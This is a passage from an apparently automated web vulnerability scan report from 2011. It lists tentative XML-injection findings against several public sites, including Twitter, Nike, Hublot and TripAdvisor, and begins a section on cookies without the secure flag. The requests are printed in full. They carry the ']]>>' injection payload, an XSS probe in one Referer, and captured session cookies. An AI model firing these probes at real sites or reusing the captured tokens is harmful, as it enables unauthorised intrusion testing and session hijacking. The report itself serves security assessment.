Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; k=10.35.22.124.1317385056818946; __utma=43838368.1721518288.1314976448.1317595795.1317595795.7; __utmz=43838368.1317595795.6.6.utmcsr=status.twitter.com|utmccn=(referral)|utmcmd=referral|utmcct=/; ab_sess_remember_me_on_signup_83=1; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCHWE8cyAToHaWQiJTc2YzZjNDk3OTg0ZmYw%250AYTg0NjYyZDg4MzE0MjFhMzBjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--72922723a18796dbaf00ccaa2433d31f37abc106

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Mon, 03 Oct 2011 00:27:03 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>57CD7457A89B31BB</RequestId><HostId>GU0XoMztLijyhyzGUkjTrWjc5+iwfzAdGa6I5F+SYntsFSDeBE
...[SNIP]...

8.213. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images]]>>/t.gif?_=1317601602154&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&text=CME%20Group%20%E2%80%93%C2%A0How%20the%20World%20Advances&url=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_referrer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; k=10.35.22.124.1317385056818946; __utma=43838368.1721518288.1314976448.1317595795.1317595795.7; __utmz=43838368.1317595795.6.6.utmcsr=status.twitter.com|utmccn=(referral)|utmcmd=referral|utmcct=/; ab_sess_remember_me_on_signup_83=1; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCHWE8cyAToHaWQiJTc2YzZjNDk3OTg0ZmYw%250AYTg0NjYyZDg4MzE0MjFhMzBjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--72922723a18796dbaf00ccaa2433d31f37abc106

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Mon, 03 Oct 2011 00:27:07 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>22C9FA4DDDCA5147</RequestId><HostId>j5UfIaXBC8rSIUR9TcCWnWDMm8gLoM+HfzpNlS410wtM+H/F9A
...[SNIP]...

8.214. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images/t.gif]]>>?_=1317601602154&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&text=CME%20Group%20%E2%80%93%C2%A0How%20the%20World%20Advances&url=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_referrer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; k=10.35.22.124.1317385056818946; __utma=43838368.1721518288.1314976448.1317595795.1317595795.7; __utmz=43838368.1317595795.6.6.utmcsr=status.twitter.com|utmccn=(referral)|utmcmd=referral|utmcct=/; ab_sess_remember_me_on_signup_83=1; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCHWE8cyAToHaWQiJTc2YzZjNDk3OTg0ZmYw%250AYTg0NjYyZDg4MzE0MjFhMzBjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--72922723a18796dbaf00ccaa2433d31f37abc106

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Mon, 03 Oct 2011 00:27:10 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F8BDF00D2A10ACC7</RequestId><HostId>fY+AdomI4rctTRKq0k6+slenvgeINOPhDBuAoOszAcAW6TGKhX
...[SNIP]...

8.215. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/admanager.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf]]>>/v4/admanager.swf HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647; lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315103266%3B%7D

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 69E4976B5C624131
x-amz-id-2: 6gh8/rOCz74TqZ1e8TlM/rGSMHTZb19o8e15rtmFfNEv8hTObVauRUTh2C8gsylj
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:51:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>69E4976B5C624131</RequestId><HostId>6gh8/rOCz74TqZ1e8TlM/rGSMHTZb19o8e15rtmFfNEv8hTObV
...[SNIP]...

8.216. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/admanager.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf/v4]]>>/admanager.swf HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647; lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315103266%3B%7D

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 39C23244E0C098A6
x-amz-id-2: nCQyemJNRgTiKhtWoMKeI/ERiQ+lCxTllf7RoUuSJWsrL0TglkeBkvu2+X70KZ3C
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:51:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>39C23244E0C098A6</RequestId><HostId>nCQyemJNRgTiKhtWoMKeI/ERiQ+lCxTllf7RoUuSJWsrL0Tglk
...[SNIP]...

8.217. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/admanager.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf/v4/admanager.swf]]>> HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647; lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315103266%3B%7D

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: B8DCACD52CC872F9
x-amz-id-2: eD3+MfJNm9RK5Ha6SF/WckAjx8rD2HG4LmYJxkfErEws2H5jq8rqtTyhvCw1R4vW
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:51:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B8DCACD52CC872F9</RequestId><HostId>eD3+MfJNm9RK5Ha6SF/WckAjx8rD2HG4LmYJxkfErEws2H5jq8
...[SNIP]...

8.218. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://wac.edgecastcdn.net
Path:   /800003/origin.edgecast.com/cx/cdx10b.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /800003]]>>/origin.edgecast.com/cx/cdx10b.js?rnd=9808656215 HTTP/1.1
Host: wac.edgecastcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/cacheable/cedexis/radar.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:28:30 GMT
Server: ECS (sjo/5279)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.219. http://wac.edgecastcdn.net/800003/origin.edgecast.com/cx/cdx10b.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://wac.edgecastcdn.net
Path:   /800003/origin.edgecast.com/cx/cdx10b.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /800003/origin.edgecast.com]]>>/cx/cdx10b.js?rnd=9808656215 HTTP/1.1
Host: wac.edgecastcdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/cacheable/cedexis/radar.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:28:30 GMT
Server: ECS (sjo/527A)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.220. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hublot.com
Path:   /en/cmds/stats.xml.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /en]]>>/cmds/stats.xml.php HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
Content-Length: 9
Origin: http://www.hublot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; DP_WEBSITE_LANGUAGE=en; Languages=http://www.hublot.com/en/; DP_WEBSITE_24H_STAT=1317599916; DP_WEBSITE_MONTH_STAT=10.11; DP_WEBSITE_VISITOR_STAT_NEW=1317599916; __utma=1.141818197.1317599917.1317599917.1317599917.1; __utmc=1; __utmz=1.1317599917.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

CMD=TIMER

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 00:31:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /en]]&gt;&gt;/cmds/stats.xml.php was not found on this server.</p>
...[SNIP]...

8.221. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hublot.com
Path:   /en/cmds/stats.xml.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /en/cmds]]>>/stats.xml.php HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
Content-Length: 9
Origin: http://www.hublot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; DP_WEBSITE_LANGUAGE=en; Languages=http://www.hublot.com/en/; DP_WEBSITE_24H_STAT=1317599916; DP_WEBSITE_MONTH_STAT=10.11; DP_WEBSITE_VISITOR_STAT_NEW=1317599916; __utma=1.141818197.1317599917.1317599917.1317599917.1; __utmc=1; __utmz=1.1317599917.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

CMD=TIMER

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 229
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 00:31:23 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /en/cmds]]&gt;&gt;/stats.xml.php was not found on this server.</p>
...[SNIP]...

8.222. http://www.hublot.com/en/cmds/stats.xml.php [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hublot.com
Path:   /en/cmds/stats.xml.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /en/cmds/stats.xml.php]]>> HTTP/1.1
Host: www.hublot.com
Proxy-Connection: keep-alive
Content-Length: 9
Origin: http://www.hublot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4ph3147ql3ijri58if992avst5; DP_WEBSITE_LANGUAGE=en; Languages=http://www.hublot.com/en/; DP_WEBSITE_24H_STAT=1317599916; DP_WEBSITE_MONTH_STAT=10.11; DP_WEBSITE_VISITOR_STAT_NEW=1317599916; __utma=1.141818197.1317599917.1317599917.1317599917.1; __utmc=1; __utmz=1.1317599917.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

CMD=TIMER

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 00:31:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /site/cmds/stats.xml.php]]&gt;&gt; was not found on this server.</p>
...[SNIP]...

8.223. http://www.nike.com/nikefootball/home/twitterfeed [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nike.com
Path:   /nikefootball/home/twitterfeed

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /nikefootball/home/twitterfeed]]>>?locale=en_US HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKNIKE=0; s_sv_sid=524830605105; NIKE_COMMERCE_COUNTRY=US; NIKE_COMMERCE_LANG_LOCALE=en_US; NIKE_COUNTRY=USA; NIKE_LANG_LOCALE=en_US; s_cc=true; s_ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1317599910141; s_sv_112_p1=1@37@d/7125/7124/7123/7122/7121&s/7126&e/3

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 64614
Cache-Control: max-age=893
Expires: Mon, 03 Oct 2011 00:46:43 GMT
Date: Mon, 03 Oct 2011 00:31:50 GMT
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equ
...[SNIP]...
<!-- SITEXML -->
...[SNIP]...

8.224. http://www.tripadvisor.com/Commerce [src parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.tripadvisor.com
Path:   /Commerce

Issue detail

The src parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the src parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Commerce?p=BookingCom&src=32448753]]>>&geo=258705&matchID=1&from=HotelDateSearch_SmartDeals&area=QC_Inline&slot=4&cnt=6&oos=4&silo=677&bucket=1625&ttype=Hotel&inMonth=10%202011&inDay=14&outMonth=10%202011&outDay=16&adults=NaN&pid=4799 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.4*MC.11893*LS.HotelCheckRates*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.0*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; ServerPool=T

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:06:14 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.1*RVL.258705_275; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:06:14 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.21*MC.11893*LS.Redirect*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.22*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139280*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=A; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 4496
Connection: close
Content-Type: text/html;charset=UTF-8

<html xmlns:cmswindow="http://xml.apache.org/xalan/java/com.TripResearch.object.api.TAWindow"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="refresh" conten
...[SNIP]...

9. SSL cookie without secure flag set
There are 8 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


9.1. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.americanexpress-travel.com
Path:   /SSOAuthenticateResponse.do

Issue detail

The cookie issued by the application (see the Set-Cookie header in the response below) does not have the secure flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SSOAuthenticateResponse.do?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot&SSORequestPath=/hotel/HotelCobrand.do&stk=null&mrk=null&mck=0&tpg=null&mrt=null&crd=null&mrp=null&ecd=null&emg=null HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
